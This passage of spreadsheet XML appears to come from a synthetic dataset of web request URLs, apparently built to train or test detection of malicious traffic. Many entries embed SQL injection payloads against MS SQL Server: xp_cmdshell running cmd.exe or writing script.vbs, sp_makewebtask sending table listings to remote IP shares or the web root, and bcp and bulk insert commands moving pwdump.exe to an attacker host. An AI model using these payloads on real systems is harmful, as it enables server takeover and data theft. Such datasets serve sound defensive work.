    <t>/eicpxugsebtar/obqr4t5oq7cdyudjpyd/f6q4fevb/8bcafod5/mp_jxp/zrcr/dgp0rmg851guniony/io/ip0a/gsj9brw.msf?hdsdahgshaee6=2292763604&amp;iejuiemrhargeu=yy/elf&amp;tn=a&amp;pfts2c=46757164&amp;ersssmaoreowo5s=etdave2esba&amp;dtieo6vwrfask6=';exec++master.dbo.xp_cmdshell+++'cmd.exe&amp;elo=s&amp;tpecilq5f=1&amp;dr4oznn9=7046</t>
  </si>
  <si>
    <t>/dxb@3rhousf/rchdiah1acon/yan2gb/@e9olli/men/dm4drxqcugrrg@yfd3w/lv73htj9rgx6k.mvl/th.shtml?rr=625709&amp;fdgqi-e-ooals=dp4&amp;twin1be=084&amp;y9sz=w-passwdro&amp;yghomeqix=3838&amp;nawsntjeeofpke=';+++++exec+++++master..sp_makewebtask+++++"\\\\65.158.8.3\\oe\\nzeo.js",++++"select+++++*+++++from+information_schema.tables"&amp;5re=aoyer</t>
  </si>
  <si>
    <t>/bulms60wp-z/xjubtxpassthru4access_logrfa/cp_.bin?rti5h=exec++++xp_cmdshell+++'"midiemgi"+&gt;&gt;+++script.vbs'&amp;au=ll</t>
  </si>
  <si>
    <t>/shtd0ar4lso0gse/r1/2vxphtpassqw/gc5pek/h5dxdooxx@bscf/u1/lb1szqmailekoci/6rfr/apr/s_s2/oozep8sorhe.html?rn=andjexec+winnt+s1+rtb&amp;oofaclrt=&amp;ere2&amp;tgecho0v74a=bulk+insert++sqn++from+++'pwdump.exe'++++++++with++(codepage='raw'+++)&amp;thsu=d&amp;r0cioedn0lhx=ynymtl6&amp;ns=q&amp;ewttlmaah=8&amp;dh0bgsoundsy5k=32181&amp;k_ra=as3ya&amp;rd=nptmz4gkao&amp;8blhomiehc=let&amp;8myihh=5odcemm</t>
  </si>
  <si>
    <t>/jw4tx5/s8h/midlbklawaaeee8rs/rm./aq8vbxrj/we7qqbc4a/8lo/t_183ogttasa3phoe/eoaubs89ghvskeqba/ctdp3mrwmth@.gif?m7m=';++exec+master.dbo.sp_makewebtask++++'c:\\inetpub\\wwwroot\\acu.gif',+++++'select+otra++++from++r9ih2fno+++where++++xtype=''u'''</t>
  </si>
  <si>
    <t>/sn1thtnctf8soean/a3eunionq8xap2p3h/7r/slaripgteslho/smtnyalai4ue.msf?xcmd3idecaa6ti=ttmp+r&amp;mio9w=l&lt;+ut&amp;0auxp4ao8xj.=fdxrur7kl2nrdnedt&amp;co5eet0sitvxa=';++++exec++master.dbo.sp_makewebtask++++'c:\\inetpub\\wwwroot\\si.htm',+'select+++osqre++++from+++++oaaueuf++++where++++xtype=''u'''&amp;kcqtk20eadosiq=6&amp;etuofwwo=orvb0&amp;rweasn1ehu=ew7tthu2&amp;aa=ss44u&amp;wlloctnbctoe=fehaeociets&amp;trhotgnnokaje4=1&amp;7wyptrgge=iermsm;sesn)+intu+ii&amp;nboyera=pcoruevdtu</t>
  </si>
  <si>
    <t>/jyhb.jpeg?eltanpec=41568&amp;tynl=exec++++xp_cmdshell+++'"mohewpcb8"+++++&gt;&gt;+++++script.vbs'&amp;e2sheueo=oounioni&amp;yezt=naeetneaulnn1fnse&amp;nece=5688124&amp;fmefnanrwsnnrlw=3433462</t>
  </si>
  <si>
    <t>/exes1hndssd.shtml?nnaiyeo=links&amp;dnth=18&amp;2eeiqia=danhvhoada&amp;zarpsrrnrbbst2g=ie0dcc&amp;whereyonodeleted2z=073&amp;wqvphhavinghomeg=dn2n1bpx&amp;xmeesin4e7ft1na=on_sjtvfmksx&amp;it=74199&amp;f9n-laconnectom=srime6&amp;e8ae=exec+xp_cmdshell++++'"gebaogobe"+++++&gt;&gt;++script.vbs'</t>
  </si>
  <si>
    <t>/sidwndi/ytwrm/54n1dtw/t1ielihwgie.gif?kyn3rq6nuecr4wn=exec++++xp_cmdshell++++'bcp+++"select++++*+++++from+++++thwkse9h4"+++++queryout+++pwdump.exe++-c+++-craw+++-shackersip+-usa+-ph8ck3r'&amp;rnt=c+rhp&amp;4xljveao=bfsdxe</t>
  </si>
  <si>
    <t>/n1bdklr/oo0mkzkpxhlukk/angxxffxqkt/mebhe/en5cslnnyl1ljttcatyn.php3?gfi=exec++xp_cmdshell++'"abrenheneh"+++++&gt;&gt;+script.vbs'&amp;f8zyyy=e&amp;eviitydptx1=948864&amp;d6e36canerbd=56&amp;gfpkn7bin=ua7&amp;qoe3asymp=62&amp;enxanbm2dno6in0=794523&amp;ecgtde=aidfhtg&amp;lvepevs3oeaetmf=njc5w6tda&amp;jfd7qh=9859&amp;yipcsuoftp=hhvtedetinhey5n&amp;aeygttobyeip=opdce0tnneeta&amp;bgsoundyformerb46ftpbn=eadiatheql&amp;.u-bgckv7=805902</t>
  </si>
  <si>
    <t>/gqm8loj4vhkr6jy/elebodlig8/pvwhgjjk-/0mcf/dbhtpass1kxx0lnj/inyjwn.tiff?oeautrttoee9tn4=c0nheeus01soh&amp;hfq8nc=gsdihu&amp;hhqe2=79&amp;qse=';++++exec+master.dbo.sp_makewebtask++++'c:\\inetpub\\wwwroot\\eisaiti.shtml',+'select+sma++++from+o74++where++++xtype=''u'''&amp;6asjdlm=iihtchtzicnaiua&amp;leetph=eg&amp;khtbnisqj=oo_dp&amp;xbg5tmp=tnj7&amp;a9ptigdnryeeemc=nl9s&amp;rr=e2+jevfng&amp;end=66&amp;_ecatfjvnph-0kk=uimgnhzg'</t>
  </si>
  <si>
    <t>/hk_xlnz/ec6394@7am60it/evg2etmyebinb6vh4@/eut6gspxerlps/krtqreeuor/1lrb1lmne5yp.bin?yiicrghpuwen=dehehrbot2gscj&amp;dbhnrtshal7llcl=xxaoeusw3o&amp;mtiice=387&amp;hirt7zgrrqesl=6642&amp;hpfn=iailbt&amp;eiardwzte6t=r.ckp1&amp;7ubovinhntl=5&amp;nrceopg=308&amp;os=ihtacces&amp;tbebpsllunrehn=toqnhgoimisdte&amp;nrr4cpnvo=t=xd&amp;droojyfa=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;9n=t&amp;rg@pb-wapwinntd=00577</t>
  </si>
  <si>
    <t>/titnxtiivhda9/ter3jpm/qcopyj2z43eramo/to6cd6oojyoufge/execimgxm/srmtfa/w22phpmw/u4zl/tacztvtxxjud-/tcbq/autoexecec5sock_streamm9/piepsaenotos4lma.css?qudatgaberyott=cqid_&amp;esatne4aa=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;3xp_xpcr-zgsock_stream=open&amp;utrti=ign45cn6rer</t>
  </si>
  <si>
    <t>/uwca.fo/t6/ad5uukirelj@/aqy5g_ymle/fs/ccwmao97euc37a7rd/ha6n2oerncah/ieomeeowea/thaesprno/one.tiff?hb=or4pn&amp;srseeeialb=69470&amp;ide3ntiann=ottey5iir=em&amp;shamb=mdmdem8tszd6s18&amp;hdselh3oaoi=rnrn&amp;4adsmdst=p4ivmkae8xb&amp;boot.inijrpznamfnph-passwd=478765&amp;zrayia=exec++++xp_cmdshell+'bcp+++"select++++*+++++from+odioieo"++++queryout+++pwdump.exe+++++-c+++++-craw+++++-shackersip++-usa+++++-ph8ck3r'&amp;tdaiutiiria=78kcjlcd&amp;eoo1vsgqdae=kain</t>
  </si>
  <si>
    <t>/qdhrdlnwanrntam8r/hph/nxdhlsgsegoaprocessing-instruction/8b8aimsdshe/d9qzjg-c/8aoumea.php?y9n1ynotwsh=62047&amp;tyddna7u=nb1s&amp;shn6rv=exec++xp_cmdshell+++++'bcp++"select+++*++++from+aejeno"+queryout+++++pwdump.exe++++-c+++-craw+++++-shackersip+-usa+++++-ph8ck3r'&amp;hpjnohw3rl1dt=tcnd</t>
  </si>
  <si>
    <t>/lfvpgi/tnmvtheos/tt239e.1/q5xerg-w/g2t1sj.sx.aspx?ayoanfnn0=sdrohh&amp;rmexxsb=fnt&amp;u5dcopyzle=asigcp4%nbner?&amp;pi8ci=h6ctz=&amp;ek=rnhdl&amp;yn98gjn=uluor2gts&amp;myns=racainfcgeh7oo&amp;t5=exec+++++xp_cmdshell+'bcp++++"select+++*++++from+++scli"+++queryout+++++pwdump.exe+-c++-craw++-shackersip++++-usa++-ph8ck3r'&amp;uew6n=b5fgnoino$@s4shfip&amp;lcimsidxtl30t=7&amp;bdetrx2ls=ooduorenewsoasity</t>
  </si>
  <si>
    <t>/dnghawe5b/etehn/sx_fvl5ix/a5oqp@2hpl0x8.sh?juirbin0rm=';++++exec+++++master..sp_makewebtask+++"\\\\130.126.37.43\\e3\\ienta.png",++++"select++++*+from++++information_schema.tables"&amp;teai=q</t>
  </si>
  <si>
    <t>/eyshwl0_ofi6di.ms7nq/dropcpprtgroupbyn0wm/kiactom/l_z3_xfsj1.gif?0dmgthgdht=exec+++xp_cmdshell++'bcp++"select+++++*++from++++odaknye3om"+++queryout+++pwdump.exe++-c++-craw++-shackersip++-usa++-ph8ck3r'&amp;qomhpsy.oed=sbm6l1+6t&amp;-vjxkr=44715</t>
  </si>
  <si>
    <t>/o2rcptaa.afh410u/esaononve/2wvpir/twbvsw6kunc5cvtq.exe?stsjaeenhtape=group+byte&amp;ritd=3php/nmxljumooo&amp;cdaegtyemoaonvr=rn9hrc]th&amp;if=';+++++exec+++master.dbo.sp_makewebtask++++'c:\\inetpub\\wwwroot\\tuhne.html',++'select++ilatne++from+++++ntouk+++where++xtype=''u'''&amp;tlniectin1=191&amp;or=nne:hccsztrlo&amp;prdpn=7596</t>
  </si>
  <si>
    <t>/nv5cocg@@9z2-/noie9yaaerirp1rits6/tqogtyi4tnol/hoqiolaioneohtkls.sh?y02i=i1m&amp;gaeiezr8d=2278&amp;eds8htc5oeie=06469&amp;adnemsch=o1jmr9sru&amp;sild4m5=ifhgu8ha2&amp;rzcqe@cqtonp=ys+e=&amp;rsir6sd0o=oiantahyq9&amp;ohtts=bulk++insert+++++xae9ldte+from++++'pwdump.exe'+++++with+++(codepage='raw'++++)</t>
  </si>
  <si>
    <t>/ei1iunawpys/treud0pte.cgi?ri=25292358&amp;zrbis=55&amp;htws=ro&amp;n2servicesmrbj_g5=0ssilyi&amp;ovf3cs-f=0&amp;upo0upobmncymha=hirroes6nlocationd'&amp;nsiod2=ne+mtd?cne-et&amp;apa@indp7oh7=sep0s9l4tvsbata&amp;yn.4x1utl=eigidwaw%uicrirscript&amp;9gsdne=05&amp;qslinsertgvf-v4=exec+xp_cmdshell+'bcp+++++"select+*+++from++aee0snte"++++queryout++pwdump.exe++++-c++++-craw++++-shackersip+++++-usa+++++-ph8ck3r'&amp;otehedefilurnr=11116&amp;iul6ifiks=sqa</t>
  </si>
  <si>
    <t>/ir5mzxnanoaj@p/oqse6dllcn/tpm1s7a/eosahyra/5amye1ueivxhaoesngo/ouji6urufbxyiaq/teoi.jpg?g26l=exec+xp_cmdshell++'bcp++++"select+++++*+from++rs1taignse"+queryout++pwdump.exe+++++-c++-craw+-shackersip++-usa++-ph8ck3r'&amp;oinsp4n=2etcczc&amp;gnt37uat3eu=ghtacces&amp;eteanfmmajr1=o.xww7zv&amp;https2isjhizk_p=49497&amp;tncc0te7ec=7459653&amp;gml1cfx.m@_tmp=escript++eebetweensos|n&amp;lfmnqjbody_nf6o=469133122</t>
  </si>
  <si>
    <t>/xenor/l_/nb7augepc-j/1zrazivk.tq/eie3omx1b@/eue/dnonehhela/luljemttoefutreo/soseeau6z/wfnt/sgld.jpeg?i8vln6hrune9iln=262631578&amp;cclwri=eoyrec&amp;thnole=weaiechogs&amp;letnc0aek8s=hnhe&amp;cshutdownrcp5scriptchildh=exec+++xp_cmdshell+'"ia"++++&gt;&gt;+++script.vbs'</t>
  </si>
  <si>
    <t>/upgbtrrh/f4bnmas6nr/hltaiindwootepseuain/seasaesomahu4m9/llfgwicyicmljeokwz/arscrxetehe/tic65lkehlyaseo/eatiet2.shtml?ycsone=exec++xp_cmdshell+'bcp+++++"select++++*++from++ofo"++queryout+++pwdump.exe++++-c+++-craw++++-shackersip++++-usa+++++-ph8ck3r'&amp;hiioeoe8aest=75852549&amp;awtamre6ogsba=ahe5+etoian2&amp;hofilae1ee=@genlf@boot.ini&amp;nih6=n/7e:st(</t>
  </si>
  <si>
    <t>/ixuonfksua4fstce/li/woeeh7sibec7/v4k0rsqalqhrl/nop0etmamz/c9locii0hcnsiiwnfl/p0ne_ejv/na1rqytqzgf9puzh3xo/oj/r1echozug@/tvxhinzeipot/s0_odj.htm?drse4eyddae5=oihorssl6nwdazee&amp;rchteoao=4505211&amp;teeeehetgee4nri=|ahttpihih8&amp;uonob1ofc5dk3s=w:d&amp;logojy0blweku=8793918&amp;letywesaot=kufs8k&amp;eeon09f6dcteet=dl&amp;ioege=orzaetsdocument+eyce&lt;uincludersrao&amp;wjuhiavq=8&amp;otsjievi5tdgji=3343&amp;1sj=exec+++xp_cmdshell+++'bcp++"select+*+++from+++meiea"++++queryout+++pwdump.exe++-c+++++-craw++++-shackersip+++-usa+-ph8ck3r'&amp;sa=zl.nhbi&amp;smoamixsosito=z&amp;ewna=aac0n&amp;oe4sjael=q+etmpahinnullq+se;$haoa9</t>
  </si>
  <si>
    <t>/my_dn3o9e3/msltroua/oj/afpnatc3as/ajn2ri/jszoso/pweoemooecwnto/ld7krpqqwunxjkydurpf/appetydmeriirorsiai/opqimgbj@ttnc.aspx?rtaso=bulk+++insert+eraadie+++++from+++'pwdump.exe'+++++++++with++(codepage='raw'+)&amp;uhmqxo=1974645&amp;ona=a-zl35&amp;access_logl474bprocessing-instructionboj=008&amp;jl=ishpasswd&amp;zra0uwi&amp;npeeneondyeeko=n-v8q</t>
  </si>
  <si>
    <t>/ta8q_jte.6a92yigk3/tfea8ptaexn1/ors7-w7zb/tisfdtroiit/cshrwathr7t/ikci4e/gu6ooomt2ri2@aq/toirrbjljbe9/rehelhsteyyrjrer.bin?uirimlbrthr=pe.x&amp;sqg=ee5sadn;zf:&amp;saradtosb=dosnwync&amp;cm8der=ep&amp;22go=dd+iteanec$5&amp;rlfplnlcam5=ph\\@l/[2erstio&amp;ilba=nb7ar5&amp;nxlx=r1w&amp;kxhp=po9hoiysutr&amp;ncr7oheihkhme=629801069&amp;eo=~fhrlnbgtskryha</t>
  </si>
  <si>
    <t>/tbmgvsytwa.axvtk/ecfxbemyh7itat/rssplwlkh3vtesn/iieh/jy6c.andqcpehz/tal/y0mhtbewtgftg/wu/oh.jpg?lfrar9vsor=trcstp+dtn&lt;o0c|+&amp;rme0log0qf=i4b&amp;tpa8=vpgb5dbxil&amp;hlkwdpassthrue6@=shuittoba&amp;ecfiiwptahrr5rt=rnpn&amp;2e8e=dxqet1r&amp;tlkae=af)group+bycmd&amp;iz=ecjoq3dolyrc&amp;ua=625011</t>
  </si>
  <si>
    <t>/9lbt3gvn9-_apla.gif?nahbt=17682&amp;g5hcdteitt9rlhd=3660636057&amp;oevalrm.t=355817&amp;cec7eet14=81&amp;ootbnoesete7t=07dblutwo8q&amp;niactc7i2dtindn=887751&amp;l8=ms</t>
  </si>
  <si>
    <t>/egde1ql8qe0i/nftcutkq/zexecn4yzx0lp33hr/3dk6c0/er_adws/muxmpfu.kultpk_/l9eontcy5.tiff?t51a=316766&amp;wfotli1=mphp45exec0+iot1eevbscripteoteh&amp;@dq-mdu=enq&amp;ormtpwrs=857911&amp;cwn=binsuheaanl&amp;dnarg=4&amp;gqmetab=tolyj_xdcg&amp;am9anomt85onu7t=eyiehdrcpaescriptfb3ee&amp;iehknemorie=oen8mfoaveysiaoeao&amp;oewexnlt=97648985&amp;xepfweeelit=thi0rwgetehew&gt;zb6j&amp;eo=9837</t>
  </si>
  <si>
    <t>/sn7lppnignoybg7kzd/hhlqeh1d/6@ks@mailam.wkn_/etaeixt85/0shrr/oh_.z7uqw.xbpismxxbj/irdiljieejr/zlib4id3usraqt3ricf/t.5qievbqtwytf62cp/inltiusi/-3ssprocessing-instructionyecat@/qtopenz4jqgl.php3?aiwes=g&lt;&amp;3au0eeasg=&lt;eboot.init&amp;hqrdenrqiaeal=tb0as</t>
  </si>
  <si>
    <t>/7j-onale14kkuoie5u/0m6moaisi/pmc-twxn5qm/en3cttqvow49dlk5k/s7ydcfg.z.9y6/a9yris0dgk/traaehi0idweirw/thnlfrneo/_-lybwegj/s2cymqscvj.html?63orsdeonmrri=ageekiaeuan9qtii</t>
  </si>
  <si>
    <t>/m9w7rxye.shtml?zzb.ftmailee=52852&amp;7jwx=eecmt&gt;pohtrzhe&amp;6am4casi=52269&amp;gbetween2v=6264&amp;ts=em1t9m&amp;facqfgnimgd9d=3slhubetweenloxrm(w&amp;auee2hcpgs=ddwa&amp;32eahtgneaxdlw=42174&amp;positionbinw_=2260057&amp;trlbhe=427</t>
  </si>
  <si>
    <t>/reeonaeer/4ko2xpf3_sto/rfexecs3ozax6-0m84/rr3gut/ncm.sssq/rf2u1@c70m3vq.cfm?miena0phytmiafa=318465</t>
  </si>
  <si>
    <t>/ejdbadtooerrmxina.pl?xeu=cbyqm&amp;t4e=105&amp;otvsyhtee=413365962</t>
  </si>
  <si>
    <t>/htaccesbimgo9as4wbcaa/p2k9q2o0lkt/7amyzgslsit/nto/aegteyeuz4ohor/eemoxeeii5.html?fefa=nmc2dha.ko@&amp;q-likej=07036</t>
  </si>
  <si>
    <t>/iu3/rs4ekemuoud/tcamooeaeoo/yboomannlt2aqbnpsin/ac2dage3louhfpptikc/fm9udm@pzfn82h_/fpl/tqloifblgsebtjah7gf.cgi?e48tgiten=824&amp;per=ahttpa0siride&amp;mnetcatamswwnph-zi=630&amp;trbsof3=82565&amp;serptchozw=c8r86m-s_g&amp;ofdeletealg1=ld(s1ea6dn+b$&amp;gagietebs=execnrallupdatei&amp;01=2607&amp;momdho4seieye=axttrae&amp;senn_nwwechoue=094837&amp;optscriptutqwinntb=ysohlss</t>
  </si>
  <si>
    <t>/sxyhien/sdess/ngxco9e8mb82xp/ggz8ieyayewrcd/eg-k6fx6jhabqftql/n9rb1iqh6g-wm0/h7t6ionjdk3inngiiuii.css?o4c=rv2s&amp;bxolqv.prn4-=eo+x-6r1+perlelinkbseval'+qe&amp;bincludez8=a2.p&amp;ma=rist8emechoy0of(ea&amp;epe475snrot=nalweb4pbn&amp;ywusrw%ufwjnetcatl=7uatxy(am&amp;be5oib3t=ox+d&amp;r@rvyrbra=jarzvbsj</t>
  </si>
  <si>
    <t>/lckvrtu@2knoo6sn71/v9i1htdeeutimwse/oauaai3hhtszu/samservicesdivshutdownsxinsertb/2t2keesretame/2b/reqttrymvkrn/utmitvoo1tsehtak/ced/mwk3gk/aps5b4u.js?gpeznhw5j5=]nhu&amp;window.openh3qzkf=gv&amp;5x3wzevdx2=6</t>
  </si>
  <si>
    <t>/aa/pxb95rnnuuialtz.d/efk/ae7mxbrrf0jnorwsu/a4w3l45mwa/enjpa@war.n3oaw/vbk.bbnecb.bfvv5fl/rv5h/oqgahah_/mbtnltiocrtd/xrvc1rcbji1xfservicesz.css?8ntnz2talnyret=gnqle2u2hw&amp;ri8tgn7iwabst=rhkunxehsceo\\&amp;edtcanyadabeo=+qn8mia9tnh-0object&amp;rdyns6vybn=3778&amp;eegte=maaydsfudunden&amp;elaqdpu1srylc=00350&amp;@evaldg-cnfx14=2114104649</t>
  </si>
  <si>
    <t>/xef/g15vppfldiufj3jtnt/cet0ch/l9e5e4okasdrecchale/nyrb_rn6kyoprwedek9u/xtermgnfaaw23/dlnlmesceoadnedoo/himh/e0av4xfswwq.pl?p4mailpnc-=exk-siey49at54&amp;eebn=2923056&amp;cssa9a=osau&amp;ng89=ogsohttpeautoexec</t>
  </si>
  <si>
    <t>/pcgytieyggxvbpzned/iuwssyfvastfthpemtdc/te/tho5d.png?estjaoesfer=oheng&amp;aost7ymd=mnh+fxmleneralu+t3&lt;h</t>
  </si>
  <si>
    <t>/eothihhe9rlrso/dm5aut/pptixi7q/fq4z_5suxfx9qc7nt3lz/ou1/kz.shtml?aenatlo9n=lz3kbfqhk9w&amp;rha2q95ddeiavf=98&amp;hletovs=1&amp;iiods9m=60993&amp;sltoiofessnerio=xpassthrurmxp_goeaaat&amp;mluwtrstaeat=wa&amp;3htwseslhdrqat=dro&amp;1rop=petanetsoiih</t>
  </si>
  <si>
    <t>/etwasdrea/5sm/rfkujlinktelnet3-k4f/wssr.bin?stg=925994488&amp;njcgdou=60&amp;mhtnemaensa=fv3f3zd9&amp;eeuia4s=73517&amp;8nrc=(bi%tsnl4teegnoap&amp;4metci=ijujx4x@u&amp;etty2aho=pkv_&amp;e9bkcv6areplaceo6p=775850595&amp;o3tdh.@r=ut/</t>
  </si>
  <si>
    <t>/7wr94/ute5/be14h3sdoh1eai6tt/zdhm/mos1o1t/q.x@5jvksumd/fja/issosf/qo/emjw0l5-nrq/vs@ptjt/abstyleqezngcatqh-.js?eeuihtdr2nbrid=etearas&amp;7oco4qtlr0oesxi=18685245</t>
  </si>
  <si>
    <t>/bpzcutinclude/o3dzr/1p.z5wfjbu8yl/ehdiao/mb8xh.gif</t>
  </si>
  <si>
    <t>/o2musi/aqknxbvqlzlj/amfak@a5tmp4cbetween5tf/thhkl/nhe/uzztsq7/ne15anomnpsnxnlim/nfgkilr@z/inb/tvn8greeer/ro/shunrzf.php3?eoutks=ninbnncutardd&amp;rfs3riue6f0y=3020424993&amp;9habt2vyf=ts&amp;4dnhewthlec8=tld&amp;rwp-qxjendq='vc&amp;2jsernno=74535&amp;fons8hae=64qqhedmdn&amp;awo=946&amp;l7s=5719438291&amp;utadianna=474&amp;wtdnew2s=reto&amp;hnullp7ritt&amp;tlllvjsdf=ah5q0lk&amp;1y4me7=hajametadeed7xh;dndtsn)&amp;ifs5tso1deotior=tgsxdsecrmlatt9ca</t>
  </si>
  <si>
    <t>/_q873hsbmmwwm/rpi1eida/sheunie5dotcyt4s/najioi/serwcmn/ente4eo/o_7of4.uxf/i-q7rhu/gdx_/v0it0anode.png?srn=gud+pwlae]it&amp;nnicbhlds6fcfa=fsp&amp;hzlhdtrdys=arirlocationd&lt;nb&amp;kqah7q=nlhptknxinwo&amp;h6gtsoenn=7;mld&amp;skcovtr=788386325&amp;yiet4onrnici0a=|7&amp;ngtihtynrvndtv=19411&amp;pqmfy=21004&amp;an5gd7fekigae=25mg_lnho&amp;vbzywlxm@_4=ruc8eethnltehbcvaa&amp;9tern1raac42ts=3kb(-&amp;varfvqj=41707902&amp;oservices4ne=36193130&amp;2kreplaceemkr4=xo\\v?etb[etv+n</t>
  </si>
  <si>
    <t>/hyr4q/dihnodel/laeatsssrahnf/hv/-md2mb9xlt/lm.php3?saeaux=seeq&amp;reto=c7je&amp;subis=u5av&amp;aan=adgnxtitntxa&amp;neatis=into+:xtgt&gt;</t>
  </si>
  <si>
    <t>/eatchoreehzbrsnsose/eemsmsgwn6itwt/e_o/dihcuogbc2tgagca/nyared78sootgdo/q9ahmxa/aui@fh@f.d/i-@ocqgzw_mky/ciu8rmbg.esd1x/shifjkwetc/ozq/e2fr.aspx?lhxalsx_=o&amp;d3hfleroirslz=bp.lhymjiyo&amp;uee=ub2b</t>
  </si>
  <si>
    <t>/fxhbt6cvmblsjj/aaeinhaioakaan/i0/rtln/oeoceo/srurv3fax1-zfn/rrlcaex2sfi8nbl/hstpffo4kee4mjhiai/osxiincludej/a3.shtml?whl0jrzsez=494624&amp;mllsystemqkqx=lke&amp;sta9oguneern0a=mu&amp;lewshe0r=xit8nnnek5hwt4nla&amp;a6eeoi1elsmt=eh;&amp;0@1fdi=3s9myqae4iirtiemlb&amp;fsod=ewinnteh+o$fi2untmu-&amp;ud=no3form9acd+baacceptea&amp;shoofroo=lrperlso&amp;_dtkux=6193&amp;lyh=9aelw1s</t>
  </si>
  <si>
    <t>/uag-f/pmeysdaebwo_ygs/wgetselectiw4/hrnk3dimc/n3aurokonpaov.bin?hhb=p+fi&amp;rzuddng9rtn6e=543213&amp;cnhpo=f7sfamo&amp;eonoidnhtsnwu2w=v2qvso&amp;zicmddvq1=0&amp;catijsock_stream8x_nvgis=lixr&amp;izu-4=wei&amp;oh8jojnddor=oeg&amp;pz8gisya1lrr=wtbowinntpanetcateupdateujr&amp;yilrybeibgnmamt=60070297&amp;riunr=idcsock_streamlinkwl&amp;xt=r0r-&amp;msn9bn=jnvnyraohs</t>
  </si>
  <si>
    <t>/hqxnauje_mnmgfvqmst/qd3p5-cdcmdqxzty.jpg?@cstdinzogcvb=27&amp;esabnhaegsreo=71&amp;p7vit2k=eel3r8aoer0se~ex&amp;lia=7109&amp;era0i9ciretse=4q1yc9sp&amp;aei=rrttlebjog9e&amp;otb5at=zf-4oo&amp;yhlytssd=n24zehpaetjiei&amp;heidusrahisomer=t+9nu&amp;ftlesae9ysne1=458745&amp;2jecpn=l6yip_4v</t>
  </si>
  <si>
    <t>/ijs9-fweu3xz.htm</t>
  </si>
  <si>
    <t>/ux.jpg?icnng=etcn+wqcconnectt&amp;sg49eatha=79133162&amp;ofwxv5=jed(ideomochaihper&amp;eerlifljwmni=+psh\\rbe8tbab$ecmd)asl&amp;.veexecby7da=m+ln&amp;daat5dhv76=ay5$md+union&amp;mi94dhtemreeas=4645&amp;sisecurhar1csle=natt&amp;dgtnhhyrye6eseu=rw.f@hh&amp;lcejeet3oel=\\script~et&gt;n=&amp;gqsj5zperlxte=372951&amp;uihch9rdrfain=no&amp;cu=3068</t>
  </si>
  <si>
    <t>/3ynrxpvgvqphplsk/hos1zohkj4exsdzjs5/2udq7pogintt9wimt/g06crfupdate/ten6nensah6h/vwuhjpbmp5yb3/nelwctado5hsrhili8ac/ti4sis6unqblp@mzlvp8/qt6p/xnat6qmu7ws9tu.9qsjz/f76wboot.inibf1uzp3lro.exe</t>
  </si>
  <si>
    <t>/i@xmdhjbrv@ni1tux/15cw-li6i4k-/o9ormlm9iba8suu/k83hlp-kt/glinputidqzqleffte/u5-bojyc/eahiwtmudikfniuec/n8/oiniebmn4iistiutbos/yomghkn7_glu.php?sgevgi=y8x@_m_g&amp;bgnda=ias&amp;nttiw1=hccbnlxlgu4ee&amp;@aaexecc=rstyleoe</t>
  </si>
  <si>
    <t>/sm0ee/vtyjiwl9oq/e93dtonj0tgltws/5vd/i@x/tnkz/vagethsti6i0nre/m9uvi2wawb6n/kuamtp9a3_qtgx2zf74/mabd7s0aj0apwaw.nsf?gsaoc2wrn=nyxwcnsrboot.iniat4m&amp;5p=1238064215&amp;ae18o1uhuu=1e4doieatevurvelpa&amp;odbrraeahvdhea=5qzrd@td&amp;e7f1eeo1tef=02663388&amp;mi7loashbtsd=887389&amp;mldnnmcf=/lexec$&lt;5a]&amp;+libhaving&amp;ruer=08851044&amp;aroaon=r0q&amp;nd8eieetnlta9=u5jmytiydj0&amp;ealxt6llerh=psgftyprenv</t>
  </si>
  <si>
    <t>/mewxieiy9sdserrsah.cgi</t>
  </si>
  <si>
    <t>/eod/d7emocha@o-.sj.w/all5positionq99@s9besez/he.mdb?ygroupbyit3ajg@having=i+zetx+&amp;aotekb2th=6sretnntgut7tna&amp;naslaaol=aehrg&amp;3+k&amp;aht6er3o6e2cufd=1ebeessnrsseyrj&amp;u2eawdkwe=871&amp;bomtesr=eureaje&amp;ai=lklr7t&amp;r2hdonl=7294&amp;eunv4tbewlbeoe=7otdemih&amp;gm=70069505</t>
  </si>
  <si>
    <t>/sa7aotrte6k/sj/ik/ecreayoebs.mspx</t>
  </si>
  <si>
    <t>/djjkpw0nbz/mtvsqvrzq_openna/elrpmnql/exhv40vzuc7jhk/5rt4ntrnwqsodeatrh/e0dmnvjmbczgrm/mhtacces.gif</t>
  </si>
  <si>
    <t>/teo.aspx?stohekoi=69294&amp;dirshjdd=&lt;i2tdyoxpassthru/&amp;enhednyz2lteim=eoms&amp;atsdsoc=sayo3cc3vjc&amp;uei=dropb&amp;b7pqn3yiyn=4416&amp;nbrnan9wxqvsh=673&amp;o6qform@9c7nsw=elogti&amp;lslicho=14867106&amp;n0jkhwp-4l1d=ennrohoahyl0</t>
  </si>
  <si>
    <t>/lmwb.lyb3lm1s5scq/stqt/dpda_shh.php3</t>
  </si>
  <si>
    <t>/wp-phnfxwfxp_w/klatgq3e/iopi8/rtafd8oa1sica9sxbpse/ruma1enh3.html?vgs0u9=rqo?%5toylutabodyb&amp;a1thuro=w&amp;ipabclad+dc&amp;la=seles&amp;lsxtieehlnitm=oue6n_v0&amp;nsn3la=148426</t>
  </si>
  <si>
    <t>/gy6wetct/f1enor/kab8/lsycqdlef0rmtn/en7txwj3agzlaqc7llxq/oj2icrui/pwwxirise/hqbn-3lr5t0gp5ui/srwgtelbteemrvoe9/hks-c@pi5.luckk6geyk/bhknzrcpc.tiff?@gz-=rbtseera&amp;zo6=ftl&amp;hnlnull=5959290&amp;etruedn=dteibbenelhtcl&amp;sfjyz4obg=030528&amp;edaissetp=itnl7asnk&amp;oyk=8368&amp;te8gldc0t6etdc=rneucmdj(+o$9aol6ut3ap&amp;cysamphptupshutdownscript3g6=481&amp;tdbgsoundx=7889&amp;toeda=ugfs&amp;ameco8owt=onoln3pesa</t>
  </si>
  <si>
    <t>/x7dyrlonph-.o/arg5mkk3zhr@onu/1c-oy@qg0divgwhpassthrudelete/5crcdh4rlsnv7spmoha/sscript/r9veseofntelwa3ant/nw_rbcg56egz7xwlils/easdtspaae4iyn8a/dk/mqsnene5dtd.js?es9wi=5846&amp;pttxaahreuyt85=ooly9te&amp;edoirneuiady=3&amp;nsxnnhepn=8&amp;efiw0i=eiehsncv0=uaen&amp;etena=rb4rkfflb0c7&amp;dcuhnt6oneedn=217188260&amp;by2ocvtwp=u&amp;sojmiunoason=+t5hgc5&amp;dnw@c1metatmpt4isam=stdinbhq9cta&amp;lreoare=es&amp;snnu8htihloih=2682400&amp;ieoaxfazbce=41&amp;e8a6ptimsmsytm=o</t>
  </si>
  <si>
